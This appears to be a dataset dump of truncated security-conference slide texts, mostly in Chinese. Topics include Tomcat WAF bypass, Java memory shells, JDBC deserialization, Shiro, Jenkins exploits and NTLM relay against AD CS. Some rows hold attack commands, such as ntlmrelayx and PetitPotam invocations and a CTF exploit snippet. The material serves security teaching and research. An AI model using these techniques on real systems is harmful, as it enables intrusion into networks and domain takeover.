text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
I Know Where You Are:
基于LBSN APP的地理位置追踪
2015年9月15日
赵 双(DFlower)
羅夏樸(Xiapu Luo)
1
Who AM I
赵双 (DFlower, dflower.zs@gmail.com)
•
Insight-Labs Team 成员 (http://insight-labs.org)
•
研究领域:漏洞挖掘/恶意代码分析/手机安全
•
《0day安全:软件漏洞分析技术》(第2版)作者之一
•
OWASP China 2010、 Xcon 2011 Speaker
羅夏樸 (Xiapu Luo, luoxiapu@gmail.com)
... | pdf |
Journey to the Center of the
HP28C/S
by
Travis Goodspeed
<travis at utk.edu>
regarding the work of
Paul Courbis
Sébastien Lalande
Disclaimer
I am just the translator.
My French sucks.
HP 28S
Photo by
Kurt Moerman
Part 1: Software
● Objects: List and Structure
● I/O Zone
● RAM
● Accessing Machine Language
● Further Dis... | pdf |
探寻Tomcat⽂件上传流量层⾯绕waf新姿
势
探寻Tomcat⽂件上传流量层⾯绕waf新姿势
写在前⾯
Pre
前置
深⼊
变形 更新2022-06-20
扩⼤利⽤⾯
更新Spring 2022-06-20
Spring4
Spring5
参考⽂章
写在前⾯
⽆意中看到ch1ng师傅的⽂章觉得很有趣,不得不感叹师傅太厉害了,但我⼀看那长篇的函
数总觉得会有更骚的东西,所幸还真的有,借此机会就发出来⼀探究竟,同时也不得不感慨
下RFC⽂档的妙处,当然本⽂针对的技术也仅仅只是在流量层⾯上waf的绕过
Pre
很神奇对吧,当然这不是终点,接下来我们就来⼀探究竟
前置
这⾥简单说⼀下师傅的思路
部署与处理上传war的servlet是 o... | pdf |
惡意程式與防毒軟體之爭
伙計
NISRA 2016
NISRA
教學目的
• 提供同學們資安相關入門知識,並開啟同學們資安研究的興趣
NISRA
要感謝的人太多
那就謝天吧!
NISRA
大綱
• 前言
• 我的電腦中毒了!?
• 什麼是惡意程式?
• 惡意程式的三種躲避偵測原理
• 防毒軟體的三道防禦機制
• 資安相關名詞與工具介紹
• 資安防護的迷思
• 補充:JS木馬簡單分析心得
NISRA
前言
NISRA
前言
NISRA
每一個人心中或多或少,都有中毒恐懼症
NISRA
NISRA
不只祖克伯,FBI 局長也在筆電視訊鏡頭貼
膠帶防偷窺 [科技新報]
NISRA
敵暗我明,草木皆兵
NISRA
我的電腦中毒了!?
• 電... | pdf |
Beyond the Lulz:
Black Hat Trolling, White Hat Trolling, and Hacking the Attention Landscape
SECTION 1
Are you familiar with fishing? Trolling is where you set your
fishing lines in the water and then slowly go back and forth
dragging the bait and hoping for a bite. Trolling on the Net is
the same concept - someone ... | pdf |
Who Cares
Who Cares
About IPv6?
About IPv6?
Sam Bowne
Sam Bowne
City College San Francisco
City College San Francisco
Part I
Part I
Who Cares?
Who Cares?
IPv4 Addresses: 32 Bits
IPv4 Addresses: 32 Bits
IPv4 address:
IPv4 address: 192.168.1.10
192.168.1.10
Four bytes
Four bytes
In Binary:
In Binary:
11000000 10... | pdf |
Auditing 6LoWPAN Networks
using Standard Penetration Testing Tools
Adam Reziouk
Airbus Defence and Space
adam.reziouk@airbus.com
Arnaud Lebrun
Airbus Defence and Space
arnaud.lebrun@airbus.com
Jonathan-Christofer Demay
Airbus Defence and Space
jcdemay@airbus.com
ABSTRACT
The Internet of Things is expected to... | pdf |
Servlet内存马
分类
filter 内存马是 servlet-api 内存马下的一种,也是通过接口方法动态注册 tomcat 组件。
直接查看 org.apache.catalina.core.ApplicationContext#addServlet 源代码
private ServletRegistration.Dynamic addServlet(String servletName, String
servletClass,
Servlet servlet, Map<String,String> initParams) throws
IllegalStateException {
... | pdf |
1
攻击 JavaWeb 应用
[JavaWeb 安全系列]
园长 MM
[2013-07-04]
第 2 页
攻击 JavaWeb 应用[1] -JavaEE 基础
-园长 MM
注:本节仅让大家简单的了解 Java 一些相关知识,简要介绍了下 JavaWeb 结构和 servlet 容器以及怎么样去快速找到敏
感信息,后面的章节也是建立在此基础上。本人从未从事过网络安全行业,技术不精文中肯定有很多的错误或者不足之
处,欢迎指正,THX!
1、JavaEE 基础
JSP: 全名为 java server page,其根本是一个简化的 Servlet 设计。
Servlet:Servlet 是一种服务器端的 J... | pdf |
Am I Being Spied On?
Low-tech Ways Of Detecting High-tech
Surveillance
Dr. Phil
@ppolstra
http://philpolstra.com
What this talk is about
● Determining if you are a victim of spying
– Video surveillance
– Tailing
– Audio eavesdropping
– Devices embedded in your computer,
tablet, or smart phone
Why you should care
● Go... | pdf |
Outline
Background
Meddle Framework
XRDP Fuzzing
DeviceIoControl
Sandbox
Conclusion
Meddle: Framework for piggy-back fuzzing and
tool development
Geo↵ McDonald
glmcdona@gmail.com, unaffiliated presentation
August 8, 2014
DEF CON 22
Geo↵ McDonald
glmcdona@gmail.com, unaffiliated presentation
Meddle: Framework for piggy-back... | pdf |
0x00
0x01
web
swingsakurawebpandap
webweb
webweb
uaf
webidaida
C++
webpwn
sakuraweb
6
web
SQLsqlitesqlite pwn
smugglingssrf127.0.0.1redisSSRFpwnwebpwn
0x02
httpd.conf
mpm_worker_module modules/mod_mpm_worker.so //
auth_kerb_module modules/mod_auth_kerb.so //kerberos
authn_core_module modules/mod_authn_core.so /... | pdf |
1
<Change information classification in footer> © Nokia 2016
Bell Labs
Bell Labs
4G - Who is paying
your cellular phone
bill?
Silke Holtmanns
Isha Singh
Nokia Bell Labs
2
<Change information classification in footer> © Nokia 2016
Bell Labs
Bell Labs
Industrial Security
Research?
3
Bell Labs
•
Theoret... | pdf |
Securing Linux Systems
with AppArmor
Crispin Cowan, PhD
Director of Software Engineering
Security Architect, SUSE Linux
AppArmor:
Easy-to-use Security for Ubuntu Linux
Crispin Cowan, PhD
Security Architect, SUSE
What Is This 'AppArmor' Thing
and Why Should I Care?
© Novell Inc. All rights reserved
3
Agenda
Overview
A... | pdf |
AfriNIC 1.48%
ARIN 27%
RIPE NCC 29.79%
APNIC 36.51%
LACNIC 5.23%
IPv4 Address Space Status
RIR allocations
IPv4 /8s Remaining
As of 31 March 2010
Available /8s
As of 31 March 2010
IPv4 Allocations by RIR
January 1999 - March 2010
Available 8.59%
Allocated 77.74%
Unavailable 13.67%
GLOBAL IP ADDRESSING
STATISTICS
For m... | pdf |
1
浅谈Goby Redteam版本破解
前⾔
基础信息收集
尝试破解
从官⽅获取Goby Redteam版本
作者:天河
Goby是⼀款新的⽹络安全测试⼯具,由赵武Zwell(Pangolin、JSky、FOFA作者)打造,它能够
针对⼀个⽬标企业梳理最全的攻击⾯信息,同时能进⾏⾼效、实战化漏洞扫描,并快速地从⼀个
验证⼊⼝点,切换到横向。我们希望能够输出更具⽣命⼒的⼯具,能够对标⿊客的实际能⼒,帮
助企业来有效地理解和应对⽹络攻击。
前⼏天在⽹络上冲浪,偶然得知goby还有Redteam版本,发现⽹络上并没有Redteam版本的破解版。
也没有相关的破解⽂章,因此我对goby的验证体系产⽣了好奇。考虑到开发者利益这⾥不展示具... | pdf |
MySQL-JDBC反序列化
漏洞原理
参考文章:
eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack
小白看得懂的MySQL JDBC 反序列化漏洞分析
MySQL JDBC 客户端反序列化漏洞分析
MySQL JDBC反序列化漏洞
上面这个是BlackHat Europe 2019议题中的利用链,在连接数据库的过程中可以触发漏洞。连接
的条件: jdbc:mysql://attacker/db?
queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
... | pdf |
Threat Data Visualization
Steve Ginty
Brandon Dixon
July 18th 2013
Verisign Confidential
2
Verisign Confidential and Proprietary
• Identify the problem
• Discuss the solution
• Walk through use targeted attack use case
• Identify caveats
• Conclusion
Overview and Agenda
3
Verisign Confidential and Proprietary
• Attack’... | pdf |
Jenkins CVE-2018-1000861 内存马注
⼊
Jenkins 介绍
Jenkins是⼀个开源的、提供友好操作界⾯的持续集成(CI)⼯具,在企业中使⽤⾮常⼴泛
相关分析可以看 l1nk3r 师傅的⽂章:https://xz.aliyun.com/t/6361
作者 Orange 分析:https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
前⾔
Jenkins 低版本下 (Jenkins <= 2.137 ) 我们可以在未授权的情况下通过 groovy 来进⾏命令执⾏, ⽽且利⽤⽅式也⾮
常简单只需要发... | pdf |
研发运营安全白皮书
(2020年)
云计算开源产业联盟
OpenSource Cloud Alliance for industry,OSCAR
2020年7月
版权声明
本白皮书版权属于云计算开源产业联盟,并受法律保护。
转载、摘编或利用其它方式使用本调查报告文字或者观点的,
应注明“来源:云计算开源产业联盟”。违反上述声明者,本联
盟将追究其相关法律责任。
前 言
近年来,安全事件频发,究其原因,软件应用服务自身存在代码
安全漏洞,被黑客利用攻击是导致安全事件发生的关键因素之一。随
着信息化的发展,软件应用服务正在潜移默化的改变着生活的各个方
面,渗透到各个行业和领域,其自身安全问题也愈发成为业界关注的
焦点。... | pdf |
listener
Listener的介绍
1. Listener 的分类
tomcat 中 Listener 分为两类, org.apache.catalina.LifecycleListener 以及 java 原生的
Java.util.EvenListener ,其中 LifecycleListener 是为了监听 tomcat 的各个容器的生命周
期的,比如 StandardEngine , StandardHost , StandardContext , StandardWrapper 这些容
器的启动,关闭等等。这些监听处在的位置为容器启动,此时 servlet 未建立, request 请求未
创建,不适合用于创建内存... | pdf |
author: pen4uin
开始之前
这篇文章(笔记)理论上是在两个月前就应该完成的,由于前段时间手头活有点
多,就给落下了。
但是,最近因为疫情防控的原因,回了学校开始远程实习,而且我的秋招也差
不多算结束了,所以目前自我安排的时间相对来说毕竟富余。正好趁国庆小长假好好
把前4个月(HW — 现在)的笔记捋一捋、总结归档,也算是为这一年多的实习生活画
上一个句号,调整心态迎接下一段"社畜"生活的开始👀!
Resin "特性"
问题描述
测试文件
"特性"场景
step1-上传文件
在写某微OA的文件上传漏洞的EXP时,发现上传jsp文件后,即使jsp文件自删除后仍然
可以访问(坑了... | pdf |
David Meléndez Cano
David Meléndez Cano
R&D Embedded Systems Engineer
@taiksontexas
Taiksonprojects.blogspot.com
Project “The Interceptor”:
Owning anti-drone systems with nanodrones
David Meléndez Cano
@TaiksonTexas
● R&D Embedded Software Engineer in
Albalá Ingenieros, S.A. Spain
● Author of the robots: "Atropos" & "T... | pdf |
Malicious CDNs: Identifying Zbot
Domains en Masse via SSL
Certificates and Bipartite Graphs
Dhia Mahjoub and Thomas Mathew
Overview
• The goal of this talk is to provide a series of simple
statistical methods that allow a researcher to
identify ZBot domains using SSL data
• All of the data discussed is open source ... | pdf |
ESC8是一个http的ntlm relay,原因在于ADCS的认证中支持ntlm认证。
默认即存在
下面开始攻击复现,首先我们需要搭建一个辅助域控
勾选域服务
安装即可,同理设置为域控
选择添加到现有域
选择从主域复制
重启后测试:
下面即可开始攻击。
1
python3 Petitpotam.py ‐u '' ‐d '' ‐p '' "ntlmrelay address" "DC02 addres
s"
1
ntlmrelayx.py ‐t http://adcs/certsrv/certfnsh.asp ‐smb2support ‐‐adcs ‐‐t
emplate 'DCTest'
获取到证书
然后使用证书请求DC02$的票... | pdf |
1
⼀次jsp上传绕过的思考
背景
解决⽅案
jsp利⽤EL表达式绕过
jspx利⽤命名空间绕过
jspx利⽤<jsp:expression>绕过
@yzddmr6
前⼏天有个⼩伙伴做项⽬的时候遇到⼀个问题来问我,⼤概情况如下:
1. jsp的站,可以任意⽂件上传
2. 上传jsp会把<%中的<给转义掉
3. 上传jspx会把<jsp:scriptlet>到</jsp:scriptlet>中的内容替换为空
问有什么突破办法?
背景
2
当时研究了⼀下后jsp和jspx各给了⼀个解决⽅案,发到星球⾥后@hosch3n师傅⼜给了⼀种⽅案,tql
其实问题等价于:
1. jsp不使⽤<% %>标签如何执⾏命令
2. jspx不使⽤<jsp... | pdf |
Spartan 0day & Exploit
exp-sky
who am i
• Tencent’s Xuanwu Lab
• The security of browser
• Vulnerability discovery
• Exploit technique
• APT attacks detection
Spartan 0day & Exploit
• 1、Isolation Heap
• 2、Memory Protection
• 3、Spartan Memory Manage
• 4、CFG
• 5、Exploit Bypass All
• 6、0day
• 7、Q&A
Isolation Hea... | pdf |
S-shiro550
前言
环境搭建
1. 参考文章:
Shiro 反序列化记录
Shiro RememberMe 1.2.4 反序列化导致的命令执行漏洞
2. 远程调试:
tomcat 启动修改,新建 debug.bat 文件,内容如下。
IDEA 配置远程 Tomcat 服务器。
set JPDA_ADDRESS=8000
set JPDA_TRANSPORT=dt_socket
set CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -
Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8... | pdf |
ByteCTF WriteUp by Nu1L
Author: Nu1L
ByteCTF WriteUp by Nu1L
PWN
easyheap
gun
Misc
Double Game
PT Site
survey
checkin
WEB
douyin_video
jvav
Reverse
QIAO
DaShen Decode AES
CrackMe
PWN
easyheap
from pwn import *
# s = process("./easyheap",env={'LD_PRELOAD':"./libc-2.31.so"})
# s = process("./easyheap")
s = remote("123.56... | pdf |
Hardware Black Magic:
Building devices with FPGAs
Dr. Fouad Kiamilev, Professor
CVORG Labs
Electrical and Computer Engineering
University of Delaware
http://cvorg.ece.udel.edu
Updated Slides
and Video
Updated slides as well as video
tutorials will be available after the
conference on our website at
http://www.cvor... | pdf |
零、前⾔
⼗⼀本来打算不卷了,好好放松放松,但是⼏个事情对我触动⽐较⼤,所以就⼜给⾃⼰设了个搞懂 RMI 反序列化相
关攻击的学习⽬标。
再加上⼀是为后续深⼊ IIOP/T3 打下基础,⼆是最近⼀位师傅问了我关于利⽤ RMI 回显的思路,帮师傅搞了半天没
有搞定,怪我之前对 RMI 只是浅浅的了解,甚⾄都算不上会,没能帮上这位师傅的忙,很是⾃责,所以花点时间学
⼀学。
这部分的实现略有复杂,本⽂在写的时候也是深感吃⼒,RMI 相关的⽂章在⽹上乱七⼋糟,由于⼜涉及到安全更新
和绕过,之前看了⼏次看的头晕眼花,这次趁着有空梳理⼀下。
个⼈能⼒有限,如有理解错误及偏差,请不吝赐教。
⼀、RMI 介绍
RMI (Remote Method ... | pdf |
!
"
#
$
%
&
#
'
(
)
)
*
)
+
*
)
,
(
-
'
(
)
'
.
+
%
/
0
1
2
3
4
5
2
6
7
8
8
"
#
#
7
9
"
9
:
7
;
8
"
7
"
#
9
;
<
=
#
7
9
"
#
9
#
=
#
9
"
7
=
"
#
>
9
?
8
8
"
#
9
"
#
@
9
;
<
#
9
@
9
A
7
8
!
6
8
"
#
>
9
?
8
>
7
A
;
8
=
7
A
;
9
9
8
B
C
9
9
>
7
"
D
... | pdf |
Managed Code Rootkits
Managed Code Rootkits
Hooking into Runtime Environments
Hooking into Runtime Environments
Erez Metula,
Erez Metula,
Secure Software Engineer
Secure Software Engineer
Application Security Department Manager, 2BSecure
Application Security Department Manager, 2BSecure
ErezMetula@2bsecure.co.il
Ere... | pdf |
前言
周六晚上,本来打开电影网站准备看电影的时候,导师发来张图,说这个 exe 在添加进启动项的时候,
360没有拦截,就想着我们能不能也利用下。
先说结论:分析后我个人感觉利用难度较大,价值不高,如果有师傅可以成功利用的话,请疯狂call
我!!!
首先我的第一反应是白加黑,但很快被当头一棒,不能想当然。还是要老老实实分析,切忌主观臆断。
先了解下这个程序,看到这里喜忧参半,看描述似乎确实有木马伪装成这个程序,但这个程序有签名。
下面要做的就是分析这个程序的加载方式了,这里我选择的火绒剑来监控。
首先删除这个注册表项,然后重装vmtools,安装完成后, vmtoolsd.exe 会被写进启动项。我们做的
就是分析安装过程中,该值... | pdf |
Smishsmash
Blackhat 2022
About us
Thomas Olofsson
●
Digital Nomad (many homes)
●
Founder sec-t.org
●
Co-founder FYEO Inc
●
Winner defcon CTFs ages ago
●
Secure coding and
development
●
Likes threat actor research and
incident investigations
thomas@gofyeo.com
Twitter: @skjortan
Mikael Bystrom
●
Hardware and software h... | pdf |
Hardware Hacking for Software Geeks
David Gustin and Ab3nd
Introduction
● Why this talk?
● Building a lab
● Tools
● Forward Engineering
● Reverse Engineering
Building a Lab
● Space
● Ventilation
● Lighting
● Work surfaces
● Grounding
Soldering
● Iron selection
● Solder selection
● Practicing
● Limits of human ability
A... | pdf |
About
• 阿里巴巴移动安全专家
• 曾发现谷歌,苹果等众多国
内外知名公司漏洞
• 擅长windows安全,
andrdoid安全,漏洞挖掘
• 支付宝钱包终端攻防对抗组
的负责人
• 客户端技术专家
• 主要移动端逆向、漏洞挖掘、
防护
dragonltx
曲和
Alipay.unLimit.Security.Team
1
第三方库安全现状
2
攻击Android第三方库
3
Fuzz*Android第三方库
4
第三方库安全思考
5
Q&A
Agenda
Part. 01
第三方库安全现状
3
探索⼀切、攻破⼀切 | [ Hacker@KCon ]
探索⼀切、攻破⼀切 | [ Hacker@KCon ]
探索⼀切、攻破⼀... | pdf |
mainframed767 &
bigendiansmalls
B.U.M. Corp. Confidential
Security Necromancy:
Further Adventures
in Mainframe Hacking
mainframed767 &
bigendiansmalls
B.U.M. Corp. Confidential
B.U.M. Corp. Confidential
Genesis
• Wondered: Who’s researching this
shit?
– Windows
4,951
– Mac OSX
2,270
– z/OS (ma... | pdf |
The Psychology of Computer Insecurity
Peter Gutmann
University of Auckland
Why can’t users get security right?
Users are idiots
• Developers build security applications
• Users apply them incorrectly
• Users are idiots
• QED
Why can’t users get security right?
OK, so users are irrational
Definition: “Rational”
• How ge... | pdf |
July 19, 2005
C
1
Hacking from WEB
行政院 國家資通安全會報
技術服務中心
For HIT2005
Charmi Lin
C
2
前言
•網站伺服器(Web Server),幾乎是每一個
組織單位在網際網路上都必須要提供的網
路服務。
•WEB管理失當的危險
C
3
常見的WEB弱點
• 伺服器應用程式Buffer Overflow
• MISConfiguration(配置失當)
• 使用者輸入驗證上的錯誤
• 網頁程式邏輯上的錯誤
• 程式輸出錯誤
• 密碼管制失當
C
4
Buffer Overflow
•常被使用也最容易修補、發現
•修補方式僅需安裝廠商的修補程式即可
C
5
MISConf... | pdf |
Trustedsec ELFLoader 原理简析
0x01 简介
各类的 elfloader 一般都是内存解析或读取 elf 文件而后执行。其中有简单的例如之前讲到的
Linux 无文件攻击姿势,但是缺点也很明显例如 proc 特征、无法保护 load 的文件。今天分析
一个另一种类型的 eldloader,简要分析一下是如何实现的。项目为 trustedsec 出品
(https://github.com/trustedsec/ELFLoader)。
0x02 Loader 技术细节
查看项目结构。
主要功能实现逻辑都在 ELFLoader.c 中,为了能跨平台运行可以看到做了一些适配性工作,
将大部分类如输出打印、字符处理等函... | pdf |
Embedded System Design:
From Electronics
to Microkernel Development
Rodrigo Maximiano Antunes de Almeida
E-mail: rmaalmeida@gmail.com
Twitter: @rmaalmeida
Universidade Federal de Itajubá
Creative Commons License
The work ”Embedded System Design: From Electronics to Microkernel
Development” of Rodrigo Maximiano Antunes... | pdf |
Computer Science / www.isec.utulsa.edu
How to Hack Your Mini Cooper:
Reverse Engineering CAN Messages
on Passenger Automobiles
Jason Staggs
Computer Science / www.isec.utulsa.edu
Who is this guy?
• Jason Staggs
– Graduate Research Assistant
• Institute for Information Security (iSec)
• Crash Reconstruction R... | pdf |
The Big Picture:
Digital Cinema Technology and Security
Mike Renlund
Digital Cinema Specialist
Film: How its always been done
• 35mm film is the standard, more than a mile
of it for one movie.
• IMAX film is 10 times larger than 35mm.
• The image hasn’t been upgraded much in the
more than a century that movies have ... | pdf |
SRC
1. IP
2.
1.SSL
2.
3.Github
4.DNS
5.
SSL
12
SRC
SSL
1.censys.io
2.crt.sh
1.riskiq
2.shodan
3.findsubdomains
[]
[]
4.censys.io
5.dnsdb.io
DNS
SSLGithub
crt.shnss.a.com
Github
GET
json
fastjson
Github
github
IP
IPASIP
IP
: http://IPwhois.cnnic.net.cn/ 123.58.191.1
[IP]
IP
Netease-Network
IPNetea... | pdf |
> Nicolas FISCHBACH
IP Engineering Manager - COLT Telecom
nico@securite.org - http://www.securite.org/nico/
> Sébastien LACOSTE-SERIS
IP R&D Manager, Security Officer - COLT Telecom
kaneda@securite.org - http://www.securite.org/kaneda/
version 1.0
Layer 2, routing protocols,
router security & forensics
© 2002 Sécurité... | pdf |
DCFluX in:
The Man with
the Soldering Gun
Presented By:
Matt Krick, DCFluX – K3MK
Chief Engineer, New West Broadcasting Systems, Inc.
DEFCON 17
Las Vegas, NV
Thursday July 30, 2009; 16:00 – 16:50
The following
presentation has been
edited to run in the time
allotted.
Hidden Agenda
1. Safety
2. Solder
3. FluX on: F... | pdf |
OPTIGUARD:
A SMART METER ASSESSMENT TOOLKIT
July 14, 2012
Presented by:
INGUARDIANS, INC.
Don C. Weber, Senior Security Analyst
don@inguardians.com
White Paper
OptiGuard: A Smart Meter Assessment Toolkit
2
July 14, 2012
Copyright 2012 InGuardians, Inc.
TABLE OF CONTENTS
1.0
Role of Smart Meters__________... | pdf |
前⾔:
由于本次靶场环境L.N.前辈给的权限是直接在内⽹的权限,所以缺少了实战中最艰难且必不可少的⼀
环,那就是⼊⼝点的获取,以下wp是模拟实战中vpn配置⽂件泄漏导致内⽹沦陷的过程
1⼊⼝点
模拟vpn配置⽂件泄漏,连接后发现分配ip如下
然后我们尝试扫描10.10.0/16段的常规端⼝和banner以及⼀些常⽤漏洞
发现简易脆弱点如下
10.10.22.161 windows rpc调⽤可能存在ssrf 配合401中继
10.10.24.52存在sql注⼊以及main.php⽂件任意写
10.10.22.44 ajp
10.10.22.67 17010 03 x86
10.10.26.151 ajp
最终选择攻击最简单的 通过f... | pdf |
#BHUSA @BlackHatEvents
Tunable Replica Circuit for Fault-
Injection Detection
Daniel Nemiroff
Carlos Tokunaga
• Fault‐Injection Attack Basics
• Dive into the TRC (Tunable Replica Circuit)
• Why and How Intel Integrated the TRC
• TRC Calibration and Validation
• Conclusions and Productization
Non‐Invasive FI Attacks
• T... | pdf |
COMMON
VULNERABILITIES
COMMON
VULNERABILITIES
In this document you can find common vulnerabilities that are reported commonly. We believe
that verifying this list and fixing these issues or adding it to out of scope ahead of the start of
the project might save you some budget!
EXCESSIVE INFORMATION LEAKAGE TROUGH ERR... | pdf |
欢迎参加 BlueHat Shanghai
Eric Doerr
微软安全响应中心总经理
@edoerr
May 30, 2019
2019 年,中国的安全研究员是微软漏洞赏金
计划中成果最多,影响力最大的贡献者
增长
57%
来自中国的漏
洞赏金计划参
与者
46%
来自中国的漏
洞赏金计划提
交成果
2018 vs 2019
影响力
中国,48%
全球,52%
漏洞赏金计划奖金
中国,22%
全球,78%
符合漏洞赏金计划要求的提交
2018 vs 2019
侧重点
2019
所提交漏洞类型的划分
内存安全问题
56%
信息泄露
15%
微软漏洞赏金计划
Microsoft Office
Insider
Microsoft... | pdf |
Common
Vulnerabilities on
Forget Password
Functionality
User Enumeration
Missing Rate Limiting
SQL Injection
Cross-Site Scripting
Text Injection/Content Spoofing
HTML Injection in Email
Password Reset Poisoning via
Host Header Injection
Re-usable Password Reset Token
No Expiration on Password Reset
T... | pdf |
1
bof⼩测
⼀个正常C程序,如何转换成bof⽂件,这⾥记录下过程
bof的原理实现就不多讲了,简单来说就是编译成⼀个object⽂件(COFF格式,exe是PE格式),然后
传输给beacon后在终端上完成链接过程,这也就导致bof⽂件⾮常⼩,⼀般只有⼏K。
参考
https://wbglil.gitbook.io/cobalt-strike/cobalt-strike-yuan-li-jie-shao/untitled-3
在github有⼏个不错的开源项⽬,可以以此为模板进⼀步开发,⽽不需要完全重头开始。
https://github.com/trustedsec/CS-Situational-Awareness-... | pdf |
2021年7月26日 群精华总结
概述
问题1:创建服务做自启动的时候出现“占位程序接收到错误数据”的错误
问题2:powershell加载dll反射执行错误
问题3:openfire管理员账号密码在哪儿?
问题4:怎么查询域管理员在域内哪台机器上登录了?
问题5:想问下免杀里面申请到内存后((void(*)())exec)();这个是啥意思呢?
问题1:创建服务做自启动的时候出现“占位程序接收到错误数据”的错误
解决:复制sc.exe到其他目录,然后重命名sc.exe,再执行创建服务,解决问题。
问题2:powershell加载dll反射执行错误
解决:Add-Type -LiteralPath "c:\xxx\ddd.dll"
... | pdf |
Convert to Electric Vehicles
2009
Electric Auto Association (EAA)
“Promoting the
use of electric
vehicles since
1967”
Electro Automotive
VoltsRabbit
Acterra EV
Conversion Project
DC Motor
Example components
Why Build an EV?
Today there are limited production electric vehicles available, so converting an e... | pdf |
掃吧你!從協議面抓出機歪的
遠端桌面後門
orange@chroot.org
About Me
• 蔡政達 aka Orange
• CHROOT 成員
• DEVCORE Security Consultant
• HITCON, PHPCONF, PYCON …等講師
• 揭露過 Microsoft, Django, Yahoo …等漏洞
• 專精於駭客手法、Web Security 與網路滲透
水議題? 老議題?
old issue ?
yes, it is.
遠端桌面後門?
Remote Desktop Backdoor ?
遠端桌面 "相黏鍵" 後門?
R... | pdf |
Live-Fire Exercise:
Baltic Cyber Shield 2010
Kenneth Geers
Naval Criminal Investigative Service (NCIS)
Cooperative Cyber Defence Centre of Excellence (CCD COE)
Overview
• May 10-11, 2010
• International cyber defense exercise (CDX)
• CCD CoE / Swedish National Defence College
• Six Blue Teams
– Northern European gov, m... | pdf |
7/7/13
IPython Notebook
localhost:8888/a1253220-71b8-49cd-bd84-1d0edbd6bd60/print
1/7
In [56]:
In [57]:
High level stats
In [58]:
Epoc to datetime
In [60]:
In [61]:
Device discovery over time
In [62]:
import pandas
import json
import os
import datetime
#the following is the path to your client json files
data_path="..... | pdf |
Oracle Penetration Testing Using the Metasploit Framework
Chris Gates & Mario Ceballos
Metasploit Project
Abstract
Over the years there have been tons of Oracle exploits, SQL Injection vulnerabilities, and post
exploitation tricks and tools that had no order, methodology, or standardization, mainly just random .sql
... | pdf |
公司介绍:
• 宜信——创立于2006年,从事普惠金融和财富管理事业的金融科技企业。在支付、
网贷、众筹、机器人投顾、智能保险、区块链等前沿领域积极布局,通过业务孵化和
产业投资参与全球金融科技创新。
• 成立十二年以来,始终坚持以理念创新、模式创新和技术创新服务中国高成长性人群、
大众富裕阶层和高净值人士,真正的让金融更美好。
宜人宜己,美好生活
部门介绍:
• 宜信安全部直属于宜信总公司,承接总部及所有子公司的安全需求,为公司的业务安全保驾护航。
※安全部成4年以来,弥补了公司安全基础建设的缺失,发展至今组建了覆盖网络、应用、主机、终端、
数据逐层渗透的前沿安全架构,每一步都凝聚着肩负亿万用户信息和财产安全的责任。
※ 2018... | pdf |
Montana State Representative
Daniel Zolnikov
Politics and The Surveillance State.
The Story of a Young Politician’s Successful Efforts to Fight
Surveillance and Pass the Nation’s Strongest Privacy Bills.
About Daniel
• From Roundup, Montana.
• 31 Years Old. First Served at 25 Years Old.
• Chair of House Energy and T... | pdf |
2021-Web-HarderXSS
banfrom
hint:"cookiedomain"
set-cookiedomaincookie
def md5(s):
return hashlib.md5(s).hexdigest()
def verify(s):
for i in range(1, 9999999):
if md5(str(i).encode("utf8")).startswith(s):
return(i)
break
print(verify("6febd"))
bot
adminadmin
admindisplay:none
ssr... | pdf |
msfconsole | tee 1.txt
app
0x00
0x01
0x02
while true
do
if [ ! -n "$1" ] ;then
keyword="successful"
else
keyword=$1
fi
result=$(tail -n 1 1.txt | grep $keyword)
if test ! -z "$result"; then
wget --output-document=/dev/nu... | pdf |
Countering Denial of
Information Attacks
Gregory Conti
www.cc.gatech.edu/~conti
conti@acm.org
Original Photos: National Geographic, Photoshopper: Unknown
Disclaimer
The views expressed in
this presentation are those
of the author and do not
reflect the official policy
or position of the United
States Military Ac... | pdf |
Analysis Report
Sample 172AED81C4FDE1CF23F1615ACEDFAD65
Author Marion Marschalek [marion-m@live.at]
Date
24/03/2013
Abstract
The analyzed sample, detected as Backdoor.Win32.Banito, is multi-threaded
malware that infects files on the disk, communicates to a remote server under
the domain ns.dns3-domain.com and... | pdf |
0x01 前奏
前不久在挖掘某SRC时提交漏洞时,偶然在该SRC官⽹的编辑器发现了⼀个接⼝。
起初以为是任意⽂件包含能RCE了,后来测试发现只是拼接读取了远程资源站的图⽚,原本都想着放弃了,但是当
我在后缀添加了个+号后图⽚被意外的解析成了HTML⻚⾯,这不就意味着get到⼀个存储型XSS?
https://xxx.cn/xxxx/ueditor?image_name=/xxx.png+
接着测试发现拼接图⽚在⼀个⼆级⽬录下,尝试穿越发现存在⾃研WAF,于是Fuzz了下Payload成功Bypass。
#####WAF:
#####Bypass:
Payload:
0x02 漏洞利⽤
1. 利⽤010Editor或copy命令,制... | pdf |
© 2012
Presented by:
Home Invasion v2.0
Attacking Network-Controlled Embedded Devices
Daniel
“unicornFurn
© 2012
© 2012
•
Who are we?
© 2012
The Presenters
•
Daniel “unicornFurnace” Crowley
– Managing Consultant, Trustwave (SpiderLabs team)
•
Jennifer “savagejen” Savage
– Software Engineer, Tabbedout
•
David “videoman... | pdf |
How to get good seats in the
security theater?
Hacking boarding passes for fun and profit
Przemek Jaroszewski
przemj+defcon24@gmail.com
$ whoami
• head of Current Threat Analysis team at the Polish national CSIRT
(CERT Polska)
• 10+ years of education in programming
• Master’s degree in social psychology
• 15 years o... | pdf |
HVV 之不需要密码永久退出 LM 天擎
1. 又要到护网了,还记得去年护网客户问我天擎退出密码是多少,说想安装软件
安装不上去。
2. 我心想,好家伙,这谁家的软件这么流氓。
3. 不需要逆向这么麻烦的方法,其实很简单,重启之后进入安全模式,这个时
候天擎是没有启动的。
4. 然后进入天擎的安装目录,这个时候天擎的安装目录名称是 Tianqing
5. 然后把目录修改成 Tianqing6666
6. 最后重启进入正常模式,因为目录名字变了,天擎的自启动也就失效了.
7. 如果后面用到的时候手动启动 TQSafeUI.exe 就可以了 | pdf |
【手機鑑識技術及實務分享】
鑒真數位有限公司
黃敬博 (po@iforensics.com.tw)
時間:2011/07/23
Page 2
Agenda
Trend of Mobile Forensics
Smart Phone Forensics Focus
Commercial Solutions
Q & A
Page 3
Mobile Phone Subscribers
Page 4
Computers versus Mobiles
Mobiles are supplanting traditional computing – it is now predicted
by the end of 2011, th... | pdf |
Bypass firewalls, application
